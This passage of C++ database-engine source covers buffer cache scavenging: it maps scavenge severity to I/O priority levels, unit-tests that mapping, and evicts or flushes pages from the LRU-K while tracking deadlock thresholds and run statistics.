qosIoDispatch = qosIODispatchBackground;
goto HandleError;
}
// Otherwise, scale linearly.
const INT iUrgentLevel =
qosIODispatchUrgentBackgroundLevelMin +
(INT)( ( ( (__int64)( qosIODispatchUrgentBackgroundLevelMax - qosIODispatchUrgentBackgroundLevelMin ) ) *
( (__int64)( ulScavengeSev - ( ulMaintScavengeSevMin + 1 ) ) ) ) / ( (__int64)( ( ulMaintScavengeSevMax - 1 ) - ( ulMaintScavengeSevMin + 1 ) ) ) );
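// Illustrative example (consistent with the unit test below, which asserts urgent levels 1..127 and severities 0..1000):
// a severity of 500 maps to urgent level 1 + ( 126 * 499 ) / 998 = 64, and a severity of 250 maps to level 32.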
qosIoDispatch = QosOSFileFromUrgentLevel( iUrgentLevel );
HandleError:
return ( qosIoDispatch | qosIoOsPriority );
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, BufferScavengingSeverityToQos )
{
ULONG_PTR ulIoPriority = 0;
ULONG ulScavengeSev = 0;
static_assert( ulMaintScavengeSevMin == 0, "ulMaintScavengeSevMin is assumed 0." );
static_assert( ulMaintScavengeSevMax == 1000, "ulMaintScavengeSevMax is assumed 1000." );
static_assert( qosIODispatchUrgentBackgroundLevelMin == 1, "qosIODispatchUrgentBackgroundLevelMin is assumed 1." );
static_assert( qosIODispatchUrgentBackgroundLevelMax == 127, "qosIODispatchUrgentBackgroundLevelMax is assumed 127." );
// Low I/O priority.
//
ulIoPriority = JET_IOPriorityLowForScavenge;
// Min severity.
ulScavengeSev = 0;
CHECK( ( qosIOOSLowPriority | qosIODispatchBackground ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 1.
ulScavengeSev = 1;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 1 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 250.
ulScavengeSev = 250;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 32 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 500.
ulScavengeSev = 500;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 64 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 750.
ulScavengeSev = 750;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 95 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 999.
ulScavengeSev = 999;
CHECK( ( qosIOOSLowPriority | QosOSFileFromUrgentLevel( 127 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Max severity.
ulScavengeSev = 1000;
CHECK( ( qosIOOSNormalPriority | qosIODispatchImmediate ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Normal I/O priority.
//
ulIoPriority = JET_IOPriorityNormal;
// Min severity.
ulScavengeSev = 0;
CHECK( ( qosIOOSNormalPriority | qosIODispatchBackground ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 1.
ulScavengeSev = 1;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 1 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 250.
ulScavengeSev = 250;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 32 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 500.
ulScavengeSev = 500;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 64 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 750.
ulScavengeSev = 750;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 95 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Severity 999.
ulScavengeSev = 999;
CHECK( ( qosIOOSNormalPriority | QosOSFileFromUrgentLevel( 127 ) ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
// Max severity.
ulScavengeSev = 1000;
CHECK( ( qosIOOSNormalPriority | qosIODispatchImmediate ) == QosBFIMaintScavengePages( ulIoPriority, ulScavengeSev ) );
}
#endif // ENABLE_JET_UNIT_TEST
// Scavenges pages from the cache to either replenish the avail pool or shrink the cache, or both.
// Scavenging can be done in both sync and async modes.
ERR ErrBFIMaintScavengeIScavengePages( const char* const szContextTraceOnly, const BOOL fSync )
{
// When scavenging is called inline/sync we should not do cleanup checking.
// Note: We hit several allocations in this path spread across both ErrBFIFlushPage and ErrBFIEvictPage ...
// FlushPage / CBFIssueList::ErrPrepareOper
// FlushPage / CPAGE::ErrCheckPage
// FlushPage / PioreqOSFileIIOREQAllocSlot (probably fixable b/c of endless alloc)
// EvictPage / RESMGR::CLRUKResourceUtilityManager<>::_PhistAllocHistory
const BOOL fCleanUpStateSaved = FOSSetCleanupState( fFalse );
Assert( g_semMaintScavenge.CAvail() == 0 /* we should own scavenging */ );
// Initially, we try to shrink/quiesce buffers straight from the avail pool itself. That
// is only attempted if the avail pool level is above its target (cbfAvailPoolTarget) and,
// of course, the cache size (cbfCacheSize) is above its target (cbfCacheTarget).
//
// After that, we scan the LRU-K, looking for victims to evict, to either replenish the
// avail pool or shrink the cache, or both. These are the stop conditions:
//
// 1- There's no avail pool or cache shrinkage deficit.
//
// 2- The number of pending-flush buffers hit the sum of the avail pool and cache shrinkage
// deficits. Note that we subtract the pending-flush buffers for which the write I/O
// is slow or hanging. It is assumed that pending-flush buffers will soon become clean
// and easy targets for eviction. Slow I/Os may complete at some point but they are
// still discounted so that buffer scavenging can become more aggressive as avail pool
// or cache shrinkage urgency increase and I/Os don't complete. Hung I/Os are considered
// permanent errors and, as such, must also be discounted from that number.
//
// 3- We only have cache shrinkage work to do, but we could not acquire the proper sync
// objects to perform eviction + quiescing.
//
// 4- We got errDiskTilt trying to flush a dirty buffer for eviction.
//
// 5- We went through all pages in the cache. If we hit this case and could not evict
// at least one page, either wrnSlow, JET_errOutOfBuffers or JET_errOutOfMemory will
// be returned.
// - wrnSlow is returned if we visited at least one buffer that could be potentially
// evicted in the future and the error when trying to flush was not OOM.
// - JET_errOutOfBuffers is returned if all buffers are in a state of permanent error
// (including hung I/Os) or we got OOM trying to flush them, except if all flush
// attempts resulted in OOM.
// - JET_errOutOfMemory is returned when all attempts to flush pages for eviction
// resulted in an out-of-memory condition.
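// For illustration of stop condition 2 (hypothetical numbers): with an avail pool deficit of 100 buffers,
// no shrink deficit, and 150 pending flushes of which 20 are slow and 10 are hung, the scan stops with
// eScavengeCompletedPendingWrites because 100 + 0 <= ( 150 - 20 - 10 ).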
// Init local vars.
//
BFScavengeStats statsCurrRun = { 0 };
BOOL fOwnCacheResizeCritSec = fFalse;
LONG_PTR cbfCacheAddressableInitial = -1;
LONG_PTR cbfCacheSizeInitial = -1;
PBF pbf = NULL;
// Init stats.
//
Assert( g_iScavengeLastRun < g_cScavengeLastRuns );
C_ASSERT( g_cScavengeLastRuns >= 1 );
AssumePREFAST( g_iScavengeLastRun < g_cScavengeLastRuns );
statsCurrRun.iRun = g_rgScavengeLastRuns[g_iScavengeLastRun].iRun + 1;
statsCurrRun.fSync = fSync;
statsCurrRun.tickStart = TickOSTimeCurrent();
// Shrink from the avail pool first.
//
if ( ( cbfCacheSize > cbfCacheTarget ) && ( g_bfavail.Cobject() > (DWORD)cbfAvailPoolHigh ) )
{
Assert( !fOwnCacheResizeCritSec );
fOwnCacheResizeCritSec = g_critCacheSizeResize.FTryEnter();
if ( fOwnCacheResizeCritSec )
{
cbfCacheAddressableInitial = cbfCacheAddressable;
cbfCacheSizeInitial = cbfCacheSize;
BFAvail::CLock lockAvail;
g_bfavail.BeginPoolScan( &lockAvail );
pbf = NULL;
while ( ( cbfCacheSize > cbfCacheTarget ) &&
( g_bfavail.Cobject() > (DWORD)cbfAvailPoolHigh ) &&
( g_bfavail.ErrGetNextObject( &lockAvail, &pbf ) == BFAvail::ERR::errSuccess ) )
{
Assert( !pbf->fInOB0OL && pbf->ob0ic.FUninitialized() );
if ( g_bfavail.ErrRemoveCurrentObject( &lockAvail ) == BFAvail::ERR::errSuccess )
{
pbf->sxwl.ClaimOwnership( bfltWrite );
BFIReleaseBuffer( pbf );
statsCurrRun.cbfShrinkFromAvailPool++;
}
}
g_bfavail.EndPoolScan( &lockAvail );
}
}
// Cache the used cache size for assertion purposes.
OnDebug( CBF cbfCacheUsed = CbfBFICacheUsed() );
OnDebug( CBF cbfCacheUsedMin = cbfCacheUsed );
OnDebug( CBF cbfCacheUsedMax = cbfCacheUsed );
// Finally, scavenge from the LRU-K.
//
CBFIssueList bfil;
BFLRUK::ERR errLRUK = BFLRUK::ERR::errSuccess;
BFLRUK::CLock lockLRUK;
g_bflruk.BeginResourceScan( &lockLRUK );
OnDebug( const LONG cbfSuperColdedInitial = g_bflruk.CSuperColdSuccesses() );
pbf = NULL;
statsCurrRun.eStopReason = eScavengeInvalid;
while ( fTrue )
{
BFEvictFlags bfefReason = bfefReasonMax;
ULONG ulScavengeWriteSev = ulMax;
// Retrieve and sanitize target values: cache values so we're dealing with a static value,
// but only for one iteration of the function as we want to continue to respond to changes
// in globals from under us.
//
statsCurrRun.cbfCacheSize = (LONG)cbfCacheSize;
Assert( statsCurrRun.cbfCacheSize >= 0 );
statsCurrRun.cbfCacheTarget = (LONG)cbfCacheTarget;
Assert( statsCurrRun.cbfCacheTarget >= 0 );
statsCurrRun.cCacheBoosts = g_cCacheBoosts;
statsCurrRun.cbCacheBoosted = g_cbCacheBoosted;
const LONG_PTR cbfMaintCacheSizeStartedLast = g_cbfMaintCacheSizeStartedLast;
if ( cbfMaintCacheSizeStartedLast >= 0 )
{
statsCurrRun.cbfCacheSizeStartShrink = (LONG)cbfMaintCacheSizeStartedLast;
Assert( statsCurrRun.cbfCacheSizeStartShrink >= 0 );
statsCurrRun.dtickShrinkDuration = (TICK)LFunctionalMax( DtickDelta( g_tickMaintCacheSizeStartedLast, TickOSTimeCurrent() ), 0 );
}
else
{
statsCurrRun.cbfCacheSizeStartShrink = 0;
statsCurrRun.dtickShrinkDuration = 0;
}
statsCurrRun.cbfAvailPoolLow = (LONG)cbfAvailPoolLow;
Assert( statsCurrRun.cbfAvailPoolLow >= 0 );
statsCurrRun.cbfAvailPoolHigh = LFunctionalMax( statsCurrRun.cbfAvailPoolLow, (LONG)cbfAvailPoolHigh );
Assert( statsCurrRun.cbfAvailPoolHigh >= 0 );
Assert( statsCurrRun.cbfAvailPoolLow <= statsCurrRun.cbfAvailPoolHigh );
statsCurrRun.cbfAvailPoolTarget = LBound( (LONG)cbfAvailPoolTarget, statsCurrRun.cbfAvailPoolLow, statsCurrRun.cbfAvailPoolHigh );
Assert( statsCurrRun.cbfAvailPoolTarget >= 0 );
Assert( statsCurrRun.cbfAvailPoolLow <= statsCurrRun.cbfAvailPoolTarget );
Assert( statsCurrRun.cbfAvailPoolTarget <= statsCurrRun.cbfAvailPoolHigh );
statsCurrRun.cbfAvail = (LONG)g_bfavail.Cobject();
Assert( statsCurrRun.cbfAvail >= 0 );
// Calculate avail pool and cache shrink deficits.
const LONG_PTR dcbfAvailPoolDeficit = LpFunctionalMax( statsCurrRun.cbfAvailPoolHigh - statsCurrRun.cbfAvail, 0 );
const LONG_PTR dcbfShrinkDeficit = LpFunctionalMax( statsCurrRun.cbfCacheSize - statsCurrRun.cbfCacheTarget, 0 );
// Check for early criteria satisfaction
//
// Nothing to do.
if ( ( dcbfAvailPoolDeficit == 0 ) && ( dcbfShrinkDeficit == 0 ) )
{
statsCurrRun.eStopReason = eScavengeCompleted;
break;
}
// Nothing to do for now, because we hope to be able to evict enough pages
// to make up for our deficit soon.
Assert( statsCurrRun.cbfFlushPending >= ( statsCurrRun.cbfFlushPendingSlow + statsCurrRun.cbfFlushPendingHung ) );
if ( ( dcbfAvailPoolDeficit + dcbfShrinkDeficit ) <= ( statsCurrRun.cbfFlushPending - statsCurrRun.cbfFlushPendingSlow - statsCurrRun.cbfFlushPendingHung ) )
{
statsCurrRun.eStopReason = eScavengeCompletedPendingWrites;
break;
}
#ifdef DEBUG
// This dramatically increases the number of times we scavenge pages, as we only free one
// page between passes. This allows a much higher rate of sync scavenging/eviction, and thus
// increases lockless-IO completion on foreground threads, so this is a great concurrency
// check. Surprisingly, this doesn't seem to materially affect runtime in accept.
if ( g_modeExtraScavengingRuns == 0 )
{
if ( ( g_modeExtraScavengingRuns = (BOOL)UlConfigOverrideInjection( 37600, 0 ) ) == 0 )
{
g_modeExtraScavengingRuns = ( ( rand() % 4 ) == 3 ) ? 2 /* injection */ : 1 /* normal */; // only 25% chance of rain
}
}
if ( ( statsCurrRun.cbfAvail > 0 ) && // Avail pool is not totally depleted.
( statsCurrRun.dtickShrinkDuration <= ( dtickMaintScavengeShrinkMax / 10 ) ) && // Shrink has not been running for too long.
( ( rand() % g_modeExtraScavengingRuns ) != 0 ) &&
!FNegTest( fStrictIoPerfTesting ) )
{
statsCurrRun.eStopReason = eScavengeBailedRandomlyDebug;
break;
}
#endif
// Get next scavenge/eviction target.
//
errLRUK = g_bflruk.ErrGetNextResource( &lockLRUK, &pbf );
// No more objects, bail.
if ( errLRUK != BFLRUK::ERR::errSuccess )
{
Assert( errLRUK == BFLRUK::ERR::errNoCurrentResource );
statsCurrRun.eStopReason = eScavengeVisitedAllLrukEntries;
break;
}
statsCurrRun.cbfVisited++;
// Compute scavenge/flush severity.
//
// We only have shrink work to do.
if ( ( dcbfShrinkDeficit > 0 ) && ( dcbfAvailPoolDeficit == 0 ) )
{
fOwnCacheResizeCritSec = fOwnCacheResizeCritSec || g_critCacheSizeResize.FTryEnter();
// We could not acquire the resize critical section and there's no avail pool work to do,
// so bail.
if ( !fOwnCacheResizeCritSec )
{
statsCurrRun.eStopReason = eScavengeBailedExternalResize;
break;
}
bfefReason = bfefReasonShrink;
ulScavengeWriteSev = UlBFIMaintScavengeShrinkSev( statsCurrRun );
}
// We only have avail pool work to do.
else if ( ( dcbfAvailPoolDeficit > 0 ) && ( dcbfShrinkDeficit == 0 ) )
{
bfefReason = bfefReasonAvailPool;
ulScavengeWriteSev = UlBFIMaintScavengeAvailPoolSev( statsCurrRun );
}
// We have both avail pool and shrink work to do, pick the one with higher severity.
else
{
const ULONG ulScavengeWriteAvailPoolSev = UlBFIMaintScavengeAvailPoolSev( statsCurrRun );
const ULONG ulScavengeWriteShrinkSev = UlBFIMaintScavengeShrinkSev( statsCurrRun );
if ( ulScavengeWriteAvailPoolSev > ulScavengeWriteShrinkSev )
{
bfefReason = bfefReasonAvailPool;
}
else if ( ulScavengeWriteShrinkSev > ulScavengeWriteAvailPoolSev )
{
bfefReason = bfefReasonShrink;
}
else
{
// Same severity: at lower severities, pick shrink. Avail pool maintenance is more
// accurately measured (it is directly tied to user activity), so at higher severities
// we know for sure we need to grow the avail pool and prefer it instead.
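// For example, with the current min/max severities of 0 and 1000, equal severities of 400 (at or below the
// midpoint of 500) pick shrink, while equal severities of 700 pick avail pool maintenance.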
if ( ulScavengeWriteAvailPoolSev <= ( ( ulMaintScavengeSevMin + ulMaintScavengeSevMax ) / 2 ) )
{
bfefReason = bfefReasonShrink;
}
else
{
bfefReason = bfefReasonAvailPool;
}
}
// Switch from shrink to avail pool if we don't have the proper critical section.
if ( ( bfefReason == bfefReasonShrink ) &&
!( fOwnCacheResizeCritSec = ( fOwnCacheResizeCritSec || g_critCacheSizeResize.FTryEnter() ) ) )
{
bfefReason = bfefReasonAvailPool;
}
ulScavengeWriteSev = ( bfefReason == bfefReasonShrink ) ? ulScavengeWriteShrinkSev : ulScavengeWriteAvailPoolSev;
}
// Cache global cache vars, if still uninitialized.
if ( ( bfefReason == bfefReasonShrink ) && ( cbfCacheAddressableInitial == -1 ) )
{
Assert( cbfCacheSizeInitial == -1 );
cbfCacheAddressableInitial = cbfCacheAddressable;
cbfCacheSizeInitial = cbfCacheSize;
}
// Attempt actual eviction.
//
BOOL fPermanentErr = fFalse;
BOOL fHungIO = fFalse;
Assert( ( bfefReason == bfefReasonAvailPool ) || ( bfefReason == bfefReasonShrink ) );
Assert( ( bfefReason != bfefReasonShrink ) || ( fOwnCacheResizeCritSec && ( cbfCacheAddressableInitial != -1 ) && ( cbfCacheSizeInitial != -1 ) ) );
const BFEvictFlags bfef = BFEvictFlags( bfefReason | ( ( bfefReason == bfefReasonShrink ) ? bfefQuiesce : bfefNone ) );
const ERR errEvict = ErrBFIEvictPage( pbf, &lockLRUK, bfef );
if ( errEvict >= JET_errSuccess )
{
if ( bfefReason == bfefReasonAvailPool )
{
statsCurrRun.cbfEvictedAvailPool++;
}
else
{
statsCurrRun.cbfEvictedShrink++;
}
}
else if ( errEvict == errBFIPageDirty )
{
// Attempt to write the page so we're able to evict it soon.
//
// Punt resource to the next bucket to avoid visiting it again while it's undergoing write
if ( pbf->sxwl.ErrTryAcquireSharedLatch() == CSXWLatch::ERR::errSuccess )
{
g_bflruk.PuntResource( pbf, (TICK)( g_csecBFLRUKUncertainty * 1000 ) ); // Punt it to the next bucket.
pbf->sxwl.ReleaseSharedLatch();
}
// Async-flush this page.
const IOREASON ior = IOR( ( ( bfefReason == bfefReasonShrink ) ? iorpBFShrink : iorpBFAvailPool ), fSync ? iorfForeground : iorfNone );
const OSFILEQOS qos = QosBFIMaintScavengePages( UlParam( PinstFromIfmp( pbf->ifmp ), JET_paramIOPriority ), ulScavengeWriteSev );
const ERR errFlush = ErrBFIFlushPage( pbf, ior, qos, bfdfDirty, fFalse /* fOpportune */, &fPermanentErr );
// Count the number of latched pages we see.
if ( errFlush == errBFLatchConflict )
{
statsCurrRun.cbfLatched++;
}
// Count the number of dependent pages we see.
else if ( errFlush == errBFIRemainingDependencies ||
errFlush == errBFIPageTouchTooRecent ||
errFlush == errBFIDependentPurged )
{
statsCurrRun.cbfDependent++;
statsCurrRun.cbfTouchTooRecent += ( errFlush == errBFIPageTouchTooRecent ); // Count the number of pinned pages due to LLR.
fPermanentErr = fPermanentErr || ( errFlush == errBFIDependentPurged ); // Should be treated as a permanent error because we'll never get out of this state.
}
// We caused a page to be flushed (not necessarily this page).
else if ( errFlush == errBFIPageFlushed )
{
statsCurrRun.cbfFlushed++;
statsCurrRun.cbfFlushPending++;
}
// We see a page that is in the process of being flushed.
else if ( errFlush == errBFIPageFlushPending )
{
statsCurrRun.cbfFlushPending++;
}
// We see a page that is in the process of being flushed and the I/O is slow.
else if ( errFlush == errBFIPageFlushPendingSlowIO )
{
statsCurrRun.cbfFlushPending++;
statsCurrRun.cbfFlushPendingSlow++;
}
// We see a page that is in the process of being flushed and the I/O is hung.
else if ( errFlush == errBFIPageFlushPendingHungIO )
{
statsCurrRun.cbfFlushPending++;
statsCurrRun.cbfFlushPendingHung++;
fHungIO = fTrue;
}
// Ignore pages that can't be flushed because we are on the I/O thread.
else if ( errFlush == errBFIPageFlushDisallowedOnIOThread )
{
// We should only see this if we are on the I/O thread
Assert( !fPermanentErr );
Assert( FIOThread() );
FireWall( "ScavengeFromIoThread" );
}
// If we got errDiskTilt then flush our I/O queue to hopefully get a head start on our I/O.
else if ( errFlush == errDiskTilt )
{
statsCurrRun.cbfDiskTilt++;
Assert( !fPermanentErr );
(void)bfil.ErrIssue( fFalse );
statsCurrRun.eStopReason = eScavengeBailedDiskTilt;
break;
}
else if ( errFlush == JET_errOutOfMemory )
{
statsCurrRun.cbfOutOfMemory++;
}
else if ( errFlush == errBFIPageAbandoned )
{
statsCurrRun.cbfAbandoned++;
}
else
{
fHungIO = FBFIIsIOHung( pbf ); // Just in case.
AssertSz( !fHungIO, "Hung I/Os should have been captured by other errors, so it's not expected here!" );
}
}
else if ( errEvict == errBFIPageFlushPending )
{
statsCurrRun.cbfFlushPending++;
}
else if ( errEvict == errBFIPageFlushPendingSlowIO )
{
statsCurrRun.cbfFlushPending++;
statsCurrRun.cbfFlushPendingSlow++;
}
else if ( errEvict == errBFIPageFlushPendingHungIO )
{
statsCurrRun.cbfFlushPending++;
statsCurrRun.cbfFlushPendingHung++;
fHungIO = fTrue;
}
else if ( errEvict == errBFLatchConflict )
{
statsCurrRun.cbfLatched++;
}
else if ( errEvict == errBFIPageFaultPending )
{
statsCurrRun.cbfFaultPending++;
}
else if ( errEvict == errBFIPageFaultPendingHungIO )
{
statsCurrRun.cbfFaultPending++;
statsCurrRun.cbfFaultPendingHung++;
fHungIO = fTrue;
}
else
{
FireWall( OSFormat( "ScavengeUnknownErr:%d", errEvict ) );
}
// Treat a hung I/O as a permanent error.
if ( fHungIO )
{
fPermanentErr = fTrue;
statsCurrRun.cbfHungIOs++;
}
// Ignore pages where we start getting permanent IO-type errors.
if ( fPermanentErr )
{
// Punt resource to postpone visiting it again.
if ( pbf->sxwl.ErrTryAcquireSharedLatch() == CSXWLatch::ERR::errSuccess )
{
g_bflruk.PuntResource( pbf, 60 * 1000 ); // 1 minute into the future
pbf->sxwl.ReleaseSharedLatch();
}
statsCurrRun.cbfPermanentErrs++;
}
#ifdef DEBUG
Assert( statsCurrRun.cbfFlushPending >= ( statsCurrRun.cbfFlushPendingSlow + statsCurrRun.cbfFlushPendingHung ) );
Assert( statsCurrRun.cbfFaultPending >= statsCurrRun.cbfFaultPendingHung );
cbfCacheUsed = CbfBFICacheUsed();
cbfCacheUsedMin = UlpFunctionalMin( cbfCacheUsedMin, cbfCacheUsed );
cbfCacheUsedMax = UlpFunctionalMax( cbfCacheUsedMax, cbfCacheUsed );
#endif // DEBUG
}// end while ( fTrue ) - for each target resource loop.
#ifdef DEBUG
Assert( statsCurrRun.eStopReason != eScavengeInvalid );
Assert( ( errLRUK == BFLRUK::ERR::errNoCurrentResource ) || ( statsCurrRun.eStopReason != eScavengeVisitedAllLrukEntries ) );
Assert( ( errLRUK != BFLRUK::ERR::errNoCurrentResource ) || ( statsCurrRun.eStopReason == eScavengeVisitedAllLrukEntries ) );
cbfCacheUsed = CbfBFICacheUsed();
cbfCacheUsedMin = UlpFunctionalMin( cbfCacheUsedMin, cbfCacheUsed );
cbfCacheUsedMax = UlpFunctionalMax( cbfCacheUsedMax, cbfCacheUsed );
const LONG cbfSuperColdedFinal = g_bflruk.CSuperColdSuccesses();
// The purpose of this code is to catch bugs where we scan too many resources (i.e., return
// the same resources multiple times). It is only an Expected() because I can't prove that it is
// mathematically impossible to hit (timing, shrink running in parallel, etc...), but it should
// hold in most cases for caches over 1000 buffers.
// Because the check is not thread-safe and the entire LRU-K is not locked during this process,
// evicted buffers could be re-allocated and show up again in the same cycle. Also, cache resizing
// running in parallel can throw off our calculations. Hence, we'll have to loosen the asserts and
// accept a 25% discrepancy.
if ( cbfCacheUsedMin >= 1000 )
{
if ( statsCurrRun.eStopReason == eScavengeVisitedAllLrukEntries )
{
// Super colded resources might move for newer positions into older ones and might
// be missed when scanning the approximate index.
const LONG cbfSuperColded = cbfSuperColdedFinal - cbfSuperColdedInitial;
Assert( cbfSuperColded >= 0 );
Expected( ( statsCurrRun.cbfVisited + cbfSuperColded ) >= ( cbfCacheUsedMin - cbfCacheUsedMin / 4 ) );
}
Expected( statsCurrRun.cbfVisited <= ( cbfCacheUsedMax + cbfCacheUsedMax / 4 ) );
}
#endif // DEBUG
// End our scan of the LRUK and issue queued writes.
//
g_bflruk.EndResourceScan( &lockLRUK );
// Issue any queued writes and log flushes.
(void)bfil.ErrIssue( fFalse );
// Compute the minimum cache size to avoid an allocation deadlock.
//
// NOTE: grow the computed size by 10% to allow efficient growth of the
// cache out of a scenario with repeated deadlocks.
Assert( statsCurrRun.cbfFlushPending >= statsCurrRun.cbfFlushPendingHung );
Assert( statsCurrRun.cbfFaultPending >= statsCurrRun.cbfFaultPendingHung );
cbfCacheDeadlock = ( statsCurrRun.cbfPermanentErrs +
statsCurrRun.cbfDependent +
statsCurrRun.cbfLatched +
( statsCurrRun.cbfFaultPending - statsCurrRun.cbfFaultPendingHung ) + // Hung already accounted for in permanent errors.
( statsCurrRun.cbfFlushPending - statsCurrRun.cbfFlushPendingHung ) + // Hung already accounted for in permanent errors.
g_bfavail.CWaiter() + ( fSync ? 1 : 0 ) );
const LONG_PTR cbfCacheDeadlockMargin = max( cbfCacheDeadlock / 10, 1 );
cbfCacheDeadlock = cbfCacheDeadlock + cbfCacheDeadlockMargin;
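// Illustrative example (hypothetical numbers): 5 permanent errors + 10 dependent + 3 latched +
// 2 non-hung fault-pending + 20 non-hung flush-pending + 4 waiters + 1 (sync caller) = 45;
// the margin is max( 45 / 10, 1 ) = 4, so cbfCacheDeadlock becomes 49.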
g_cbfCacheDeadlockMax = max( g_cbfCacheDeadlockMax, cbfCacheDeadlock );
Assert( cbfCacheDeadlock < INT_MAX );
statsCurrRun.cbfCacheDeadlock = (LONG)cbfCacheDeadlock;
// Update states and calculate if we are in a hung state.
//
// wrnSlow is returned if all buffers have been visited but none was evicted.
// wrnSlow gets upgraded to JET_errOutOfBuffers if all visited buffers are
// in a state of permanent error or we got OOM trying to evict them, except
// if all flush attempts got OOM, in which case we return JET_errOutOfMemory.
// Otherwise, we return success.
ERR errHang = JET_errSuccess;
if ( ( statsCurrRun.eStopReason == eScavengeVisitedAllLrukEntries ) &&
( ( statsCurrRun.cbfEvictedAvailPool + statsCurrRun.cbfEvictedShrink ) == 0 ) &&
( statsCurrRun.cbfVisited > 0 ) )
{
const LONG cbfUnflushable = statsCurrRun.cbfPermanentErrs + statsCurrRun.cbfOutOfMemory;
if ( cbfUnflushable >= statsCurrRun.cbfVisited )
{
Assert( cbfUnflushable == statsCurrRun.cbfVisited );
if ( statsCurrRun.cbfVisited == statsCurrRun.cbfOutOfMemory )
{
errHang = ErrERRCheck( JET_errOutOfMemory );
}
else
{
errHang = ErrERRCheck( JET_errOutOfBuffers );
}
}
else
{
errHang = ErrERRCheck( wrnSlow );
}
}
statsCurrRun.errRun = errHang;
statsCurrRun.tickEnd = TickOSTimeCurrent();
// Track the last X runs.
g_iScavengeLastRun = IrrNext( g_iScavengeLastRun, g_cScavengeLastRuns );
Assert( g_iScavengeLastRun >= 0 && g_iScavengeLastRun < g_cScavengeLastRuns );
// g_rgScavengeLastRuns[g_iScavengeLastRun] = statsCurrRun;
AssumePREFAST( g_iScavengeLastRun < g_cScavengeLastRuns );
memcpy( &(g_rgScavengeLastRuns[g_iScavengeLastRun]), &statsCurrRun, sizeof(statsCurrRun) );
// Track evenly timed runs over the last timeout span.
if ( g_rgScavengeTimeSeq[g_iScavengeTimeSeqLast].tickEnd == 0 ||
DtickDelta( g_rgScavengeTimeSeq[g_iScavengeTimeSeqLast].tickEnd, statsCurrRun.tickEnd ) > dtickMaintScavengeTimeSeqDelta )
{
g_iScavengeTimeSeqLast = IrrNext( g_iScavengeTimeSeqLast, g_cScavengeTimeSeq );
Assert( g_iScavengeTimeSeqLast >= 0 && g_iScavengeTimeSeqLast < g_cScavengeTimeSeq );
// g_rgScavengeTimeSeq[g_iScavengeTimeSeqLast] = statsCurrRun;
AssumePREFAST( g_iScavengeTimeSeqLast < g_cScavengeTimeSeq );
memcpy( &(g_rgScavengeTimeSeq[g_iScavengeTimeSeqLast]), &statsCurrRun, sizeof(statsCurrRun) );
#ifndef RTM
// g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast] = statsCurrRun;
memcpy( &(g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast]), &statsCurrRun, sizeof(statsCurrRun) );
#endif
}
else
{
Assert( g_iScavengeTimeSeqLast < g_cScavengeTimeSeq );
AssumePREFAST( g_iScavengeTimeSeqLast < g_cScavengeTimeSeq );
#ifndef RTM
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].iRun = statsCurrRun.iRun; // High iRun.
// g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].iRun = statsCurrRun.fSync;
// g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].iRun = statsCurrRun.tickStart;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].tickEnd = statsCurrRun.tickEnd; // High tickEnd.
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheSize = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheSize, statsCurrRun.cbfCacheSize );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheTarget = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheTarget, statsCurrRun.cbfCacheTarget );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheSizeStartShrink = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheSizeStartShrink, statsCurrRun.cbfCacheSizeStartShrink );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].dtickShrinkDuration = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].dtickShrinkDuration, statsCurrRun.dtickShrinkDuration );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheDeadlock = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfCacheDeadlock, statsCurrRun.cbfCacheDeadlock );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvail = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvail, statsCurrRun.cbfAvail );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolLow = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolLow, statsCurrRun.cbfAvailPoolLow );
